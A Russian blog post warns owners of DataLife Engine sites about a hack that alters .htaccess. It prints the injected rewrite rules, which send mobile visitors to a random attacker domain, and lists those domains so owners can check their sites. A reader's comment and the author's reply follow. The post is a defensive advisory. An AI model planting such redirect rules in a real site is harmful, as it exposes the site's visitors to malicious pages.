HomeНовости › Взлом DLE — продолжение

Взлом DLE — продолжение

Последние вести с фронтов.
Теперь еще изменяют файл .htaccess

RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)
RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile} !^$
RewriteCond %{HTTP_HOST} !^m\.
RewriteCond %{HTTP:Cookie} !\smredir=0(;|$)
RewriteRule ^ http://$host/ [R,L]

В $host вставляется случайным образом выбранный домен из массива:
$domains = array(‘statuses.ws’, ‘live-internet.ws’, ‘googlecount.ws’, ‘livecountall.ws’, ‘googleinternet.ws’, ‘yacounter.ws’, ‘getinternet.ws’, ‘yandex-google.ws’, ‘ya-googl.ws’, ‘ya-analytics.ws’, ‘yadirect.ws’);

Проверяйте свои сайты.

2 Comments.[ Leave a comment ]

  1. Скорая помощь

    Добрый день!
    Нашел у себя такой код! 🙁
    А что это за собой влечет???

    • Это значит, что ваши посетители на сайте, которые заходят с телефонов перенаправляются на сайты злоумышленника. На тех сайтах может быть вирус и прочее, что может привести к заражению телефонов посетителей.
      Его надо удалить, но лучше найти способ как этот код мог попасть на ваш сайт.

Reply to Verner ¬
Cancel reply